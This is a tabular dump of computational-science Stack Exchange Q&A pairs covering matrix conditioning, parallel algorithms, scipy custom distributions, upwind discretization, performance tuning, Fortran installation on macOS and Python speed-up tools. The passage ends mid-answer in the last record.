source_id (int64, 1-4.64M) | question (string, lengths 0-28.4k) | response (string, lengths 0-28.8k) | metadata (dict)
---|---|---|---
1,329 | If I have a square invertible matrix and I take its determinant, and I find that $\det(A) \approx 0$, does this imply that the matrix is poorly conditioned? Is the converse also true? Does an ill-conditioned matrix have a nearly zero determinant? Here is something I tried in Octave: a = rand(4,4);
det(a) %0.008
cond(a)%125
a(:,4) = 1*a(:,1) + 2*a(:,2) + 0.000000001*ones(4,1);
det(a)%1.8E-11
cond(a)%3.46E10 | It's the largeness of the condition number $\kappa(\mathbf A)$ that measures the nearness to singularity, not the tininess of the determinant. For instance, the diagonal matrix $10^{-50} \mathbf I$ has tiny determinant, but is well-conditioned. On the flip side, consider the following family of square upper triangular matrices, due to Alexander Ostrowski (and also studied by Jim Wilkinson): $$\mathbf U=\begin{pmatrix}1&2&\cdots&2\\&1&\ddots&\vdots\\&&\ddots&2\\&&&1\end{pmatrix}$$ The determinant of the $n\times n$ matrix $\mathbf U$ is always $1$, but the ratio of the largest to the smallest singular value (i.e. the 2-norm condition number $\kappa_2(\mathbf U)=\dfrac{\sigma_1}{\sigma_n}$) was shown by Ostrowski to be equal to $\cot^2\dfrac{\pi}{4n}$, which can be seen to increase for increasing $n$. | {
"source": [
"https://scicomp.stackexchange.com/questions/1329",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/529/"
]
} |
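A quick numerical illustration of the two cases in the answer above (a sketch I am adding, not part of the original post; the sizes are arbitrary), using NumPy rather than Octave:

```python
import numpy as np

# Tiny determinant, perfect conditioning:
A = 1e-2 * np.eye(4)
print(np.linalg.det(A), np.linalg.cond(A))    # ~1e-8 and 1.0

# Ostrowski/Wilkinson-type matrix: unit determinant, large condition number
n = 50
U = np.eye(n) + 2 * np.triu(np.ones((n, n)), k=1)
print(np.linalg.det(U), np.linalg.cond(U))    # ~1.0 and ~cot^2(pi/(4n)) ~ 4e3
```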
1,391 | Are there any famous problems/algorithms in scientific computing that cannot be sped up by parallelisation? It seems to me whilst reading books on CUDA that most things can be. | The central issue is the length of the critical path $C$ relative to the total amount of computation $T$. If $C$ is proportional to $T$, then parallelism offers at best a constant speed-up. If $C$ is asymptotically smaller than $T$, there is room for more parallelism as the problem size increases. For algorithms in which $T$ is polynomial in the input size $N$, the best case is $C \sim \log T$ because very few useful quantities can be computed in less than logarithmic time. Examples $C = T$ for a tridiagonal solve using the standard algorithm. Every operation is dependent on the previous operation completing, so there is no opportunity for parallelism. Tridiagonal problems can be solved in logarithmic time on a parallel computer using a nested dissection direct solve, multilevel domain decomposition, or multigrid with basis functions constructed using harmonic extension (these three algorithms are distinct in multiple dimensions, but can exactly coincide in 1D). A dense lower-triangular solve with an $m\times m$ matrix has $T = N = \mathcal O(m^2)$, but the critical path is only $C = m = \sqrt T$, so some parallelism can be beneficial. Multigrid and FMM both have $T = N$, with a critical path of length $C = \log T$. Explicit wave propagation for a time $\tau$ on a regular mesh of the domain $(0,1)^d$ requires $k = \tau / \Delta t \sim \tau N^{1/d}$ time steps (for stability), therefore the critical path is at least $C = k$. The total amount of work is $T = k N = \tau N^{(d+1)/d}$. The maximum useful number of processors is $P = T/C = N$, the remaining factor $N^{1/d}$ cannot be recovered by increased parallelism. Formal complexity The NC complexity class characterizes those problems that can be solved efficiently in parallel (i.e., in polylogarithmic time). It is unknown whether $NC = P$, but it is widely hypothesized to be false. If this is indeed the case, then P-complete characterizes those problems that are "inherently sequential" and cannot be sped up significantly by parallelism. | {
"source": [
"https://scicomp.stackexchange.com/questions/1391",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1017/"
]
} |
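As an illustration of the "$C = T$" example above, here is the standard (Thomas) tridiagonal solve; this is a sketch I am adding, not part of the original answer. Every pass through the loops uses the value produced in the previous iteration, so the dependency chain is as long as the total work.

```python
import numpy as np

def thomas(a, b, c, d):
    """Tridiagonal solve with sub-diagonal a, diagonal b, super-diagonal c, rhs d."""
    n = len(d)
    cp, dp = np.empty(n), np.empty(n)
    cp[0], dp[0] = c[0] / b[0], d[0] / b[0]
    for i in range(1, n):                    # forward sweep: strictly sequential
        m = b[i] - a[i] * cp[i - 1]
        cp[i] = c[i] / m
        dp[i] = (d[i] - a[i] * dp[i - 1]) / m
    x = np.empty(n)
    x[-1] = dp[-1]
    for i in range(n - 2, -1, -1):           # back substitution: also sequential
        x[i] = dp[i] - cp[i] * x[i + 1]
    return x
```

Cyclic reduction or the nested-dissection-type approaches mentioned in the answer reorganize this recurrence so that the critical path shrinks to $\mathcal{O}(\log n)$.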
1,658 | Is there a way, using some established Python package (e.g. SciPy) to define my own probability density function (without any prior data, just $f(x) = a x + b$), so I can then make calculations with it (such as obtaining the variance of the continuous random variable)? Of course I could take, say, SymPy or Sage, create a symbolic function and do the operations, but I'm wondering whether instead of doing all this work myself I can make use of an already-implemented package. | You have to subclass the rv_continuous class in scipy.stats:
import scipy.stats as st
class my_pdf(st.rv_continuous):
    def _pdf(self, x):
        return 3*x**2  # normalized over its range, in this case [0, 1]
my_cv = my_pdf(a=0, b=1, name='my_pdf') Now my_cv is a continuous random variable with the given PDF and range [0, 1]. Note that in this example my_pdf and my_cv are arbitrary names (they could have been anything), but _pdf is not arbitrary; it and _cdf are methods of st.rv_continuous, at least one of which must be overridden for the subclassing to work. | {
"source": [
"https://scicomp.stackexchange.com/questions/1658",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/782/"
]
} |
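To connect back to the question (computing the variance), the generic machinery of rv_continuous integrates the supplied _pdf numerically, so with the subclass above something like the following works (my addition, not from the original answer):

```python
print(my_cv.mean())        # 3/4 for the pdf 3x^2 on [0, 1]
print(my_cv.var())         # E[X^2] - E[X]^2 = 3/5 - 9/16 = 0.0375
print(my_cv.rvs(size=3))   # random draws from the distribution
```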
1,960 | What would be a good finite difference discretization for the following equation: $\frac{\partial \rho}{\partial t} + \nabla \cdot \left(\rho u\right)=0$? We can take the 1D case: $\frac{\partial \rho}{\partial t} + \frac{d}{dx}\left(\rho u\right)=0$. For some reason, all the schemes I can find are for the formulation in Lagrangian coordinates.
I came up with this scheme for the time being (disregard the j index): $ \frac{\rho^{n+1}_{i,j}-\rho^{n}_{i,j}}{\tau} + \frac{1}{h_x}\left(\frac{\rho^{n+1}_{i+1,j}+\rho^{n+1}_{i,j}}{2}u^{n}_{x,i+1/2,j}- \frac{\rho^{n+1}_{i,j}+\rho^{n+1}_{i-1,j}}{2}u^{n}_{x,i-1/2,j}\right)=0$ But it seems to be really unstable or to have some horrible stability condition. Is that so? The velocity is actually calculated through the Darcy law $u=-\frac{k}{\mu}\nabla p$. Plus we have the equation of state. The full system consists also of an energy equation and the equation of state for the ideal gas. The velocities can turn negative. | You are looking at the mass conservation equation: $\dfrac{dm}{dt}=0$ When considering mass evolution per unit volume, this boils down to the density advection equation in flux form: $\dfrac{\partial \rho}{\partial t} = -\nabla \cdot (\rho u)$ The good thing about this is that it is just the advection equation of an arbitrary scalar field (in our case, this happens to be density $\rho$) and it is (relatively) easy to solve, provided adequate time and space differencing schemes, and initial and boundary conditions. When designing a finite differencing scheme, we worry about convergence, stability and accuracy. A scheme is converging if $\dfrac{\Delta A}{\Delta t} \rightarrow \dfrac{\partial A}{\partial t}$ when $\Delta t \rightarrow 0$. Stability of the schemes ensures that the quantity $A$ remains finite when $t \rightarrow \infty$. Formal accuracy of the scheme tells where the truncation error in the Taylor expansion series of the partial derivative lies. Look into a CFD textbook for more details on these fundamental properties of a differencing scheme. Now, the simplest approach is to go straight to 1st order upstream differencing. This scheme is positive-definite, conservative and computationally efficient. The first two properties are especially important when we model the evolution of a quantity which is always positive (i.e. mass or density). For simplicity, let's look at the 1-D case: $\dfrac{\partial \rho}{\partial t} = -\dfrac{\partial(\rho u)}{\partial x}$ It is convenient now to define the flux $\Phi = \rho u$, so that: $\dfrac{\partial(\rho u)}{\partial x} = \dfrac{\partial \Phi}{\partial x} \approx \dfrac{\Delta \Phi}{\Delta x} \approx \dfrac{\Phi_{i+1/2}-\Phi_{i-1/2}}{\Delta x}$ Here's a schematic of what we are simulating: u u
| --> --> |
| rho | rho | rho |
x-----o-----x-----o-----x-----o-----x
i-1 i-1/2 i i+1/2 i+1 We are evaluating the evolution of $\rho$ at cell $i$. The net gain or loss comes from the difference of what comes in, $\Phi_{i-1/2}$ and what goes out, $\Phi_{i+1/2}$. This is where we start to diverge from Paul's answer. In true conservative upstream differencing, the quantity at the cell center is being carried by velocity at its cell edge, in the direction of its motion. In other words, if you imagine you are the advected quantity and you are sitting at the cell center, you are being carried into the cell in front of you by the velocity at the cell edge. Evaluating the flux at the cell edge as a product of density and velocity, both at the cell edge, is not correct and does not conserve the advected quantity. Incoming and outgoing fluxes are evaluated as: $\Phi_{i+1/2} = \dfrac{u_{i+1/2}+|u_{i+1/2}|}{2}\rho_{i}
+ \dfrac{u_{i+1/2}-|u_{i+1/2}|}{2}\rho_{i+1}$ $\Phi_{i-1/2} = \dfrac{u_{i-1/2}+|u_{i-1/2}|}{2}\rho_{i-1}
+ \dfrac{u_{i-1/2}-|u_{i-1/2}|}{2}\rho_{i}$ The above treatment of flux differencing ensures upstream-definiteness. In other words, it adjusts the differencing direction according to the sign of velocity. The Courant-Friedrichs-Lewy (CFL) stability criterion, when doing time differencing with simple first order, forward Euler differencing is given as: $\mu = \dfrac{u\Delta t}{\Delta x} \leq 1$ Note that in 2 dimensions, the CFL stability criterion is more strict: $\mu = \dfrac{c\Delta t}{\Delta x} \leq \dfrac{1}{\sqrt{2}}$ where $c$ is velocity magnitude, $\sqrt{u^{2}+v^{2}}$. Some things to consider. This scheme may or may not be appropriate for your application depending on what kind of process you are simulating. This scheme is highly diffusive, and is appropriate for very smooth flows without sharp gradients. It is also more diffusive for shorter time steps. In the 1-D case, you will obtain an almost exact solution if the gradients are very small, and if $\mu = 1$. In the 2-D case, this is not possible, and diffusion is anisotropic. If your physical system considers shock waves or high gradients of other sort, you should look into upstream differencing of higher order (e.g. 3rd or 5th order). Also, it may be worthwhile looking into the Flux Corrected Transport family of schemes (Zalesak, 1979, JCP); anti-diffusion correction for the above scheme by Smolarkiewicz (1984, JCP); MPDATA family of schemes by Smolarkiewicz (1998, JCP). For time differencing, 1st order forward Euler differencing may be satisfactory for your needs. Otherwise, look into higher-order methods such as Runge-Kutta (iterative), or Adams-Bashforth and Adams-Moulton (multi-level). It would be worthwhile looking into some CFD graduate-level textbook for a summary of above mentioned schemes and many more. | {
"source": [
"https://scicomp.stackexchange.com/questions/1960",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1088/"
]
} |
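A minimal NumPy sketch of the first-order upwind scheme described in the answer, on a periodic 1-D grid (the periodicity, grid size, and CFL number are my own choices for illustration, not part of the original answer):

```python
import numpy as np

def upwind_step(rho, u_edge, dt, dx):
    """One forward-Euler upwind step; u_edge[i] is the velocity at edge i+1/2."""
    up = 0.5 * (u_edge + np.abs(u_edge))          # selects the upstream (left) cell
    um = 0.5 * (u_edge - np.abs(u_edge))          # selects the downstream (right) cell
    flux = up * rho + um * np.roll(rho, -1)       # Phi_{i+1/2}
    return rho - dt / dx * (flux - np.roll(flux, 1))

nx = 200
dx = 1.0 / nx
x = (np.arange(nx) + 0.5) * dx
rho = np.exp(-200.0 * (x - 0.3) ** 2)             # initial density blob
u_edge = np.ones(nx)                              # uniform velocity field
dt = 0.8 * dx / np.abs(u_edge).max()              # CFL number 0.8 < 1
for _ in range(100):
    rho = upwind_step(rho, u_edge, dt, dx)
```

The flux lines are a direct transcription of the $\Phi_{i\pm 1/2}$ formulas above; with a negative velocity the same code automatically switches to the other neighbour.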
2,168 | One of the major issues that we have to deal with in molecular simulations is the calculation of distance-dependent forces. If we can restrict the force and distance functions to have even powers of the separation distance $r$, then we can just compute the square of the distance $r^2 = {\bf r \cdot r}$ and not have to worry about $r$. If there are odd powers, however, then we need to deal with $r = \sqrt{r^2}$. My question is: how expensive is computing $\sqrt{x}$ as implemented in the libraries of common languages (C/C++, Fortran, Python), etc.? Is there really a lot of performance improvements to be had by hand-tuning the code for specific architectures? | As an extension to moyner's answer , the on-chip sqrt is usually an rsqrt , i.e. a reciprocal square root that computes $a \rightarrow 1/\sqrt{a}$. So if in your code you're only going to use $1/r$ (if you're doing molecular dynamics, you are), you can compute r = rsqrt(r2) directly and save yourself the division. The reason why rsqrt is computed instead of sqrt is that its Newton iteration has no divisions, only additions and multiplications. As a side-note, divisions are also computed iteratively and are almost just as slow as rsqrt in hardware. If you're looking for efficiency, you're better off trying to remove superfluous divisions. Some more modern architectures such as IBM's POWER architectures do not provide rsqrt per-se, but an estimate accurate to a few bits, e.g. FRSQRTE . When a user calls rsqrt , this generates an estimate and then one or two (as many as required) iterations of Newton's or Goldschmidt's algorithm using regular multiplications and additions. The advantage of this approach is that the iteration steps may be pipelined and interleaved with other instructions without blocking the FPU (for a very nice overview of this concept, albeit on older architectures, see Rolf Strebel's PhD Thesis ). For interaction potentials, the sqrt operation can be avoided entirely by using a polynomial interpolant of the potential function, but my own work (implemented in mdcore ) in this area show that, at least on x86-type architectures, the sqrt instruction is fast enough. Update Since this answer seems to be getting quite a bit of attention, I would also like to address the second part of your question, i.e. is it really worth it to try to improve/eliminate basic operations such as sqrt ? In the context of Molecular Dynamics simulations, or any particle-based simulation with cutoff-limited interactions, there is a lot to be gained from better algorithms for neighbour finding. If you're using Cell lists , or anything similar, to find neighbours or create a Verlet list , you will be computing a large number of spurious pairwise distances. In the naive case, only 16% of particle pairs inspected will actually be within the cutoff distance of each other. Although no interaction is computed for such pairs, accessing the particle data and computing the spurious pairwise distance carries a large cost. My own work in this area ( here , here , and here ), as well as that of others (e.g. here ), show how these spurious computations can be avoided. These neighbour-finding algorithms even out-perform Verlet lists, as described here . The point I want to emphasize is that although there may be some improvements to gain from better knowing/exploiting the underlying hardware architecture, there are also potentially larger gains to be had in re-thinking the higher-level algorithms. | {
"source": [
"https://scicomp.stackexchange.com/questions/2168",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/348/"
]
} |
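The division-free Newton refinement mentioned in the answer looks like this (an illustrative sketch; in practice the starting guess would come from the hardware estimate instruction):

```python
def rsqrt(a, y0, iters=3):
    """Refine an initial estimate y0 of 1/sqrt(a) using only multiplies and adds."""
    y = y0
    for _ in range(iters):
        y = y * (1.5 - 0.5 * a * y * y)   # Newton step for f(y) = 1/y**2 - a
    return y

print(rsqrt(2.0, 0.7))   # ~0.7071067811865476 = 1/sqrt(2)
```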
2,173 | I work in computational science, and as a result, I spend a non-trivial amount of my time trying to increase the scientific throughput of many codes, as well as understanding the efficiency of these codes. Let's assume I have evaluated the performance vs. readability/reusability/maintainability tradeoff of the software I am working on, and I have decided that it's time to go for performance. Let's also assume that I know I don't have a better algorithm for my problem (in terms of flop/s and memory bandwidth). You can also assume my code base is in a low-level language like C, C++, or Fortran. Finally, let's assume that there is no parallelism to be had in the code, or that we're only interested in performance on a single core. What are the most important things to try first? How do I know how much performance I can get? | First of all, as skillman and Dan have pointed out, profiling is essential. I personally use Intel's VTune Amplifier on Linux as it gives me a very fine-grained overview of where time was spent doing what. If you're not going to change the algorithm (i.e. if there will be no major changes that will turn all your optimizations obsolete), then I'd suggest looking for some common implementation details that can make a big difference: Memory locality : is data that is read/used together also stored together, or are you picking up bits and pieces here and there? Memory alignment : are your doubles actually aligned to 4 bytes? How did you pack your structs ? To be pedantic, use posix_memalign instead of malloc . Cache efficiency : Locality takes care of most cache efficiency issues, but if you have some small data structures that you read/write often, it helps if they are an integer multiple or fraction of a cache line (usually 64 bytes). It also helps if your data is aligned to the size of a cache line. This can drastically reduce the number of reads necessary to load a piece of data. Vectorization : No, don't go mental with hand-coded assembler. gcc offers vector types that get translated to SSE/AltiVec/whatever instructions automagically. Instruction-Level Parallelism : The bastard son of vectorization. If some often-repeated computation does not vectorize well, you can try accumulating input values and computing several values at once. It's kind of like loop unrolling. What you're exploiting here is that your CPU will usually have more than one floating-point unit per core. Arithmetic precision : Do you really need double-precision arithmetic in everything you do? E.g. if you're computing a correction in a Newton iteration, you usually don't need all the digits you're computing. For a more in-depth discussion, see this paper. Some of these tricks are used in the daxpy_cvec this thread. Having said that, if you're using Fortran (not a low-level language in my books), you will have very little control over most of these "tricks". If you're running on some dedicated hardware, e.g. a cluster you use for all your production runs, you may also want to read-up on the specifics of the CPUs used. Not that you should write stuff in assembler directly for that architecture, but it might inspire you to find some other optimizations that you may have missed. Knowing about a feature is a necessary first step to writing code that can exploit it. Update It's been a while since I wrote this and I hadn't noticed that it had become such a popular answer. 
For this reason, I'd like to add one important point: Talk to your local Computer Scientist : Wouldn't it be cool if there were a discipline which dealt exclusively with making algorithms and/or computations more efficient/elegant/parallel, and we could all go ask them for advice? Well, good news, that discipline exists: Computer Science. Chances are, your institution even has a whole department dedicated to it. Talk to these guys. I'm sure to a number of non-Computer Scientists this will bring back memories of frustrating discussions with said discipline that led to nothing, or memories of other people's anecdotes thereof. Don't be discouraged. Interdisciplinary collaboration is a tricky thing, and it takes a bit of work, but the rewards can be massive. In my experience, as a Computer Scientist (CS), the trick is in getting both the expectations and the communication right. Expectation -wise, a CS will only help you if he/she thinks your problem is interesting. This pretty much excludes trying to optimize/vectorize/parallelize a piece of code you've written, but not really commented, for a problem they don't understand. CSs are usually more interested in the underlying problem, e.g. the algorithms used to solve it. Don't give them your solution , give them your problem . Also, be prepared for the CS to say " this problem has already been solved ", and just give you a reference to a paper. A word of advice: Read that paper and, if it really does apply to your problem, implement whatever algorithm it suggests. This is not a CS being smug, it's a CS that just helped you. Don't be offended, remember: If the problem is not computationally interesting, i.e. it has already been solved and the solution shown to be optimal, they won't work on it, much less code it up for you. Communication -wise, remember that most CSs are not experts in your field, and explain the problem in terms of what you are doing, as opposed to how and why . We usually really don't care about the why , and the how is, well, what we do best. For example, I'm currently working with a bunch of Computational Cosmologists on writing a better version of their simulation code, based on SPH and Multipoles . It took about three meetings to stop talking in terms of dark matter and galaxy haloes (huh?) and to drill down to the core of the computation, i.e. that they need to find all the neighbours within a given radius of each particle, compute some quantity over them, and then run over all said neighbours again and apply that quantity in some other computation. Then move the particles, or at least some of them, and do it all again. You see, while the former may be incredibly interesting (it is!), the latter is what I need to understand to start thinking about algorithms. But I'm diverging from the main point: If you're really interested in making your computation fast, and you're not a Computer Scientist yourself, go talk to one. | {
"source": [
"https://scicomp.stackexchange.com/questions/2173",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/9/"
]
} |
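A small demonstration of the memory-locality point (the first item in the list above); this is my own sketch in Python/NumPy, but the effect is the same one that matters in C/C++/Fortran: the two loops do identical arithmetic, yet the strided traversal touches memory far less efficiently.

```python
import time
import numpy as np

a = np.random.rand(4000, 4000)      # C (row-major) order: rows are contiguous

t = time.perf_counter()
row_total = sum(a[i, :].sum() for i in range(a.shape[0]))   # contiguous access
t_rows = time.perf_counter() - t

t = time.perf_counter()
col_total = sum(a[:, j].sum() for j in range(a.shape[1]))   # stride of 4000 doubles
t_cols = time.perf_counter() - t

print(t_rows, t_cols)   # the strided version is typically several times slower
```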
2,244 | I have matrices $A$ and $G$. $A$ is sparse and is $n\times n$ with $n$ very large (can be on the order of several million). $G$ is an $n\times m$ tall matrix with $m$ rather small ($1 \lt m \lt 1000$) and each column can only have a single $1$ entry with the rest being $0$'s, such that $G^TG = I$. $A$ is huge, so it is really tough to invert, and I can solve a linear system such as $Ax = b$ iteratively using a Krylov subspace method such as $\mathrm{BiCGStab}(l)$, but I do not have $A^{-1}$ explicitly. I want to solve a system of the form: $(G^TA^{-1}G)x = b$, where $x$ and $b$ are $m$ length vectors. One way to do it is to use an iterative algorithm within an iterative algorithm to solve for $A^{-1}$ for each iteration of the outer iterative algorithm. This would be extremely computationally expensive, however. I was wondering if there is a computationally easier way to go about solving this problem. | Introduce the vector $y:=-A^{-1}Gx$ and solve the large coupled system $Ay+Gx=0$, $G^Ty=-b$ for $(y,x)$ simultaneously, using an iterative method. If $A$ is symmetric (as seems likely though you don't state it explicitly) then the system is symmetric (but indefinite, though quasidefinite if $A$ is positive definite), which might help you to choose an appropriate method. (relevant keywords: KKT matrix, quasidefinite matrix). Edit: As $A$ is complex symmetric, so is the augmented matrix, but there is no quasidefiniteness. You can however use the $Ax$ routine to compute $A^*x=\overline{A\overline x}$; therefore you could adapt a method such as QMR ftp://ftp.math.ucla.edu/pub/camreport/cam92-19.pdf (designed for real systems, but you can easily rewrite it for complex systems, using the adjoint in place of the transpose) to solve your problem. Edit2: Actually, the (0,1)-structure of $G$ means that you can eliminate $x$ and the components of $G^Ty$ symbolically, thus ending up with a smaller system to solve. This means messing with the structure of $A$, and pays only when $A$ is given explicitly in sparse format rather than as a linear operator. | {
"source": [
"https://scicomp.stackexchange.com/questions/2244",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1480/"
]
} |
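A sketch of the suggested augmented system in SciPy (my own construction; the matrices are small stand-ins, and MINRES is one reasonable choice for the symmetric indefinite system when $A$ is real symmetric):

```python
import numpy as np
import scipy.sparse as sp
import scipy.sparse.linalg as spla

n, m = 2000, 5
A = sp.diags([-1.0, 2.1, -1.0], [-1, 0, 1], shape=(n, n), format='csr')   # SPD stand-in
rows = np.random.choice(n, m, replace=False)
G = sp.csr_matrix((np.ones(m), (rows, np.arange(m))), shape=(n, m))       # one 1 per column

b = np.random.rand(m)
K = sp.bmat([[A, G], [G.T, None]], format='csr')     # [[A, G], [G^T, 0]]
rhs = np.concatenate([np.zeros(n), -b])              # A y + G x = 0,  G^T y = -b
sol, info = spla.minres(K, rhs)
x = sol[n:]                                          # solves (G^T A^{-1} G) x = b
```

In practice $A$ might only be available as a matrix-vector routine, in which case $K$ can be supplied as a scipy LinearOperator instead of an assembled sparse matrix.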
2,469 | Related question: State of the Mac OS in Scientific Computing and HPC A significant number of software packages in computational science are written in Fortran, and Fortran isn't going away. A Fortran compiler is also required to build other software packages (one notable example being SciPy ). However, Mac OS X does not include a Fortran compiler. How should I install a Fortran compiler on my machine? | Pick your poison. I recommend using Homebrew. I have tried all of these methods except for "Fink" and "Other Methods". Originally, I preferred MacPorts when I wrote this answer. In the two years since, Homebrew has grown a lot as a project and has proved more maintainable than MacPorts, which can require a lot of PATH hacking. Installing a version that matches system compilers If you want the version of gfortran to match the versions of gcc, g++, etc. installed on your machine, download the appropriate version of gfortran from here . The R developers and SciPy developers recommend this method. Advantages : Matches versions of compilers installed with XCode or with Kenneth Reitz's installer ; unlikely to interfere with OS upgrades; coexists nicely with MacPorts (and probably Fink and Homebrew) because it installs to /usr/bin . Doesn't clobber existing compilers. Don't need to edit PATH . Disadvantages : Compiler stack will be really old. (GCC 4.2.1 is the latest Apple compiler; it was released in 2007.) Installs to /usr/bin . Installing a precompiled, up-to-date binary from HPC Mac OS X HPC Mac OS X has binaries for the latest release of GCC (at the time of this writing, 4.8.0 (experimental)), as well as g77 binaries, and an f2c-based compiler. The PETSc developers recommend this method on their FAQ . Advantages : With the right command, installs in /usr/local ; up-to-date. Doesn't clobber existing system compilers, or the approach above. Won't interfere with OS upgrades. Disadvantages : Need to edit PATH . No easy way to switch between versions. (You could modify the PATH, delete the compiler install, or kludge around it.) Will clobber other methods of installing compilers in /usr/local because compiler binaries are simply named 'gcc', 'g++', etc. (without a version number, and without any symlinks). Use MacPorts MacPorts has a number of versions of compilers available for use. Advantages : Installs in /opt/local ; port select can be used to switch among compiler versions (including system compilers). Won't interfere with OS upgrades. Disadvantages : Installing ports tends to require an entire "software ecosystem". Compilers don't include debugging symbols, which can pose a problem when using a debugger, or installing PETSc. ( Sean Farley proposes some workarounds.) Also requires changing PATH . Could interfere with Homebrew and Fink installs. (See this post on SuperUser .) Use Homebrew Homebrew can also be used to install a Fortran compiler. Advantages : Easy to use package manager; installs the same Fortran compiler as in "Installing a version that matches system compilers". Only install what you need (in contrast to MacPorts). Could install a newer GCC (4.7.0) stack using the alternate repository homebrew-dupes. Disadvantages : Inherits all the disadvantages from "Installing a version that matches system compilers". May need to follow the Homebrew paradigm when installing other (non-Homebrew) software to /usr/local to avoid messing anything up. Could interfere with MacPorts and Fink installs. (See this post on SuperUser .) Need to change PATH . 
Installs could depend on system libraries, meaning that dependencies for Homebrew packages could break on an OS upgrade. (See this article .) I wouldn't expect there to be system library dependencies when installing gfortran, but there could be such dependencies when installing other Homebrew packages. Use Fink In theory, you can use Fink to install gfortran. I haven't used it, and I don't know anyone who has (and was willing to say something positive). Other methods Other binaries and links are listed on the GFortran wiki . Some of the links are already listed above. The remaining installation methods may or may not conflict with those described above; use at your own risk. | {
"source": [
"https://scicomp.stackexchange.com/questions/2469",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/276/"
]
} |
2,493 | Background: I think I might want to port some code that calculates matrix exponential-vector products using a Krylov subspace method from MATLAB to Python. (Specifically, Jitse Niesen's expmvp function, which uses an algorithm described in this paper .) However, I know that unless I make heavy use of functions from modules derived from compiled libraries (i.e., I only use raw Python, and not many built-in functions), then it could be quite slow. Question: What tools or approaches are available to help me speed up code I write in Python for performance? In particular, I'm interested in tools that automate the process as much as possible, though general approaches are also welcome. Note: I have an older version of Jitse's algorithm, and haven't used it in a while. It could be very easy to make this code fast, but I felt like it would make a good concrete example, and it is related to my own research. Debating my approach for implementing this particular algorithm in Python is another question entirely. | I'm going to break up my answer into three parts. Profiling, speeding up the python code via c, and speeding up python via python. It is my view that Python has some of the best tools for looking at what your code's performance is then drilling down to the actual bottle necks. Speeding up code without profiling is about like trying to kill a deer with an uzi. If you are really only interested in mat-vec products, I would recommend scipy.sparse . Python tools for profiling profile and cProfile modules : These modules will give you your standard run time analysis and function call stack. It is pretty nice to save their statistics and using the pstats module you can look at the data in a number of ways. kernprof : this tool puts together many routines for doing things like line by line code timing memory_profiler : this tool produces line by line memory foot print of your code. IPython timers : The timeit function is quite nice for seeing the differences in functions in a quick interactive way. Speeding up Python Cython : cython is the quickest way to take a few functions in python and get faster code. You can decorate the function with the cython variant of python and it generates c code. This is very maintable and can also link to other hand written code in c/c++/fortran quite easily. It is by far the preferred tool today. ctypes : ctypes will allow you to write your functions in c and then wrap them quickly with its simple decoration of the code. It handles all the pain of casting from PyObjects and managing the gil to call the c function. Other approaches exist for writing your code in C but they are all somewhat more for taking a C/C++ library and wrapping it in Python. Python-only approaches If you want to stay inside Python mostly, my advice is to figure out what data you are using and picking correct data types for implementing your algorithms. It has been my experience that you will usually get much farther by optimizing your data structures then any low level c hack. For example: numpy : a contingous array very fast for strided operations of arrays numexpr : a numpy array expression optimizer. It allows for multithreading numpy array expressions and also gets rid of the numerous temporaries numpy makes because of restrictions of the Python interpreter. blist : a b-tree implementation of a list, very fast for inserting, indexing, and moving the internal nodes of a list pandas : data frames (or tables) very fast analytics on the arrays. 
pytables : fast structured hierarchical tables (like hdf5), especially good for out of core calculations and queries to large data. | {
"source": [
"https://scicomp.stackexchange.com/questions/2493",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/276/"
]
} |
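A tiny example of the first two recommendations above, profiling before optimizing and leaning on scipy.sparse for the matrix-vector products that dominate a Krylov-style code (all sizes and names here are made up for illustration):

```python
import cProfile
import numpy as np
import scipy.sparse as sp

n = 200_000
A = sp.identity(n, format='csr') + sp.random(n, n, density=1e-5, format='csr')
v = np.random.rand(n)

def matvec_loop(k=50):
    w = v.copy()
    for _ in range(k):            # repeated sparse mat-vecs, as in a Krylov iteration
        w = A @ w
        w /= np.linalg.norm(w)
    return w

cProfile.run('matvec_loop()', sort='cumulative')   # shows where the time actually goes
```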
2,748 | Generally speaking, I've heard numerical analysts utter the opinion that "Of course, mathematically speaking, time is just another dimension, but still, time is special" How to justify this? In what sense is time special for computational science? Moreover, why do we so often prefer to use finite differences, (leading to "time-stepping"), for the time dimension, while we apply finite differences, finite elements, spectral methods, ..., for the spatial dimensions? One possible reason is that we tend to have an IVP in the time dimension, and a BVP in the spatial dimensions. But I don't think this fully justifies it. | Causality indicates that information only flows forward in time, and algorithms should be designed to exploit this fact. Time stepping schemes do this, whereas global-in-time spectral methods or other ideas do not. The question is of course why everyone insists on exploiting this fact -- but that's easy to understand: if your spatial problem already has a million unknowns and you need to do 1000 time steps, then on a typical machine today you have enough resources to solve the spatial problem by itself one timestep after the other, but you don't have enough resources to deal with a coupled problem of $10^9$ unknowns. The situation is really not very different from what you have with spatial discretizations of transport phenomena either. Sure, you can discretize a pure 1d advection equation using a globally coupled approach. But if you care about efficiency, then the by far best approach is to use a downstream sweep that carries information from the inflow to the outflow part of the domain. That's exactly what time stepping schemes do in time. | {
"source": [
"https://scicomp.stackexchange.com/questions/2748",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1740/"
]
} |
2,868 | The Journal of Computational Physics has been an important outlet for computational science in the past, and I have published there before. For the benefit of those (like me) who have signed the Elsevier boycott , what non-Elsevier journals would be appropriate places to publish articles that could have been submitted to the Journal of Computational Physics? A good alternative should: Overlap (at least partially) in subject matter with JCP Have a good reputation Not be published by Elsevier Note : When I say "reputation", I don't mean impact factor. Please see this article that demonstrates that the two are not well-correlated in this field. | The SIAM Journals, especially SISC (Scientific Computing) and MMS (Multiscale Modeling and Simulation) are obvious established and high-quality choices. | {
"source": [
"https://scicomp.stackexchange.com/questions/2868",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/123/"
]
} |
2,987 | I don't want to deal with virtualenv for a local Python installation, I just want to install a few packages locally without dealing with the PYTHONPATH environment variable, how do I do that? | Python (as of 2.6 and 3.0 ) now searches in the ~/.local directory for local installs, which do not require administrative privileges to install, so you just need to point your installer to that directory. If you have already downloaded the package foo and would like to install it manually, type: cd path/to/foo
